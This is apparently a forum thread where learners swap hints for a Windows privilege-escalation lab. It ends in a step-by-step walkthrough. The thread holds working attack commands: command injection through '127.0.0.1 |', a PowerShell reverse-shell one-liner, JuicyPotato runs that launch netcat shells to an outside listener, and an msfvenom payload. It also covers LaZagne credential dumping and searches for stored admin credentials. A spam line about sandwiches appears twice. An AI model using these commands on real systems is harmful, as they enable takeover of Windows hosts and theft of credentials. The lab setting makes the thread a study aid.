You need first to priv esc to be able to search in the file system, I guess this question should be in the 3th position.
Try this script to find potential CLSID to work with : GetCLSID.ps1
Try using this powershell script to get potential CLSIDs (GetCLSID.ps1), and then you can also try to get the right ones using this one : https://raw.githubusercontent.com/ohpe/juicy-potato/master/Test/test_clsid.bat
- Escalate Privs (Find a working CLSID to use with JuicyPotato, I started from bottom up on the .list in the github repo and it worked for me first try).
- Upload LaZagne.exe to target
- Run LaZagne.exe all
Hello,
JuicyPotato returns “Wrong Argument”. Should I just keep trying with other clsid?
put the clsid in quotes
Hi. Can anyone help me? I have been stuck trying to execute JuicyPotato. I saved the .exe in C:\windows\tracing but it returns nothing when I execute it
Also when I run test_clsid.bat, it returned no CLSIDs that may be used for juicypotato even though i have run GetCLSID
I am stuck in this as well.
Can anyone help?
I am available at ‘rmjhin@gmail.com’
Thank you.
Hey , Can You send Me The Notes if you dont mind
I’m having trouble catching the elevated shell after JuicyPotato successfully elevates privileges. I’ve tried several methods, like using cmd.exe with PowerShell reverse shell commands and putting both nc.exe
and nc64.exe
on the target. I even created a .bat file to make the command easier to use. The CLSIDs aren’t the problem since I’ve found multiple working ones using the CLSID.ps1
script.
While I troubleshoot this, I might grab a sub from Firehouse Subs to keep my energy up—maybe a Hook & Ladder or Firehouse Meatball to fuel my efforts!
While I troubleshoot this, I might grab a sub from Firehouse Subs to keep my energy up—maybe a Hook & Ladder or Firehouse Meatball to fuel my efforts!
C:\windows\Temp\JuicyPotato.exe -l 53375 -p c:\windows\system32\cmd.exe -a “/c C:\windows\Temp\nc.exe 10.10.14.141 8443 -e cmd.exe” -t * -c “{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}”
did it allow you to make file transers after the new vpn?
I already solve the 1st Assesment …tip
uSE jUICY POTATO 32bit → GitHub - k4sth4/Juicy-Potato: Windows Privilege Escalation
with as CLSID → Windows Server 2016 Standard | juicy-potato
use a reverse shell and a listener using Msfconsole for a second reverseshell conection
lazagne.exe & find
pdt: use use the use post/windows/manage/execute_powershell to ejecute commands
for more detail and help → tylerjimenez120@gmail.com
try LaZagne.exe. Upload it target server and execute with (all) parameter.
Thanks brother I was stuck for weeks due to this issue. Syntax was like:
JP.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c "{CLSID}" -a "/c C:\Users\Public\nc.exe IP PORT -e cmd.exe"
Thanks for the hint, it worked
Q
127.0.0.1 | systeminfo
powershell one liner rev shell
nc -lvnp 4444
127.0.0.1 | powershell -nop -c “$client = New-Object System.Net.Sockets.TCPClient(‘10.10.14.62’,4444);$stream = $client.GetStream();$writer = New-Object System.IO.StreamWriter($stream);$reader = New-Object System.IO.StreamReader($stream);while(($cmd = $reader.ReadLine()) -ne $null){$output = Invoke-Expression $cmd 2>&1; $writer.WriteLine($output); $writer.Flush()}”
file transfer
sudo smbserver.py TMP /home/rid/ -smb2support
copy \10.10.14.62\TMP\jp.exe
127.0.0.1 | powershell mkdir C:\temp
copy \10.10.14.62\TMP\jp.exe C:\tem\jp.exe
127.0.0.1 | powershell copy \10.10.14.62\TMP\jp.exe C:\temp\jp.exe
msfvenom -p cmd/windows/reverse_powershell lhost=10.10.14.62 lport=9999 > shell.bat
127.0.0.1 | powershell copy \10.10.14.62\TMP\shell.bat C:\temp\shell.bat
download nc.exe
127.0.0.1 | powershell copy \10.10.14.62\TMP\nc.exe C:\temp\nc.exe
C:\temp\jp.exe -t * -p C:\temp\shell.bat -l 4444
C:\temp\jp.exe -l 53375 -p c:\windows\system32\cmd.exe -a “/c C:\temp\nc.exe 10.10.14.62 9999 -e cmd.exe” -t * -c “{7A6D9C0A-1E7A-41B6-82B4-C3F7A27BA381}”
dir C:\ /s /b | findstr /i “confidential.txt”
type “C:\Users\Administrator\Documents\My Music\confidential.txt”
dir C:\ /s /b | findstr /i “*.config”
powershell -Command “Get-ChildItem -Path C:\Users\ -Recurse -File | Select-String -Pattern ‘ldapadmin’”
type C:\Users\Administrator.ApacheDirectoryStudio.metadata.plugins\org.apache.directory.studio.connection.core\connections.xml
This was the post that allowed me to keep my sanity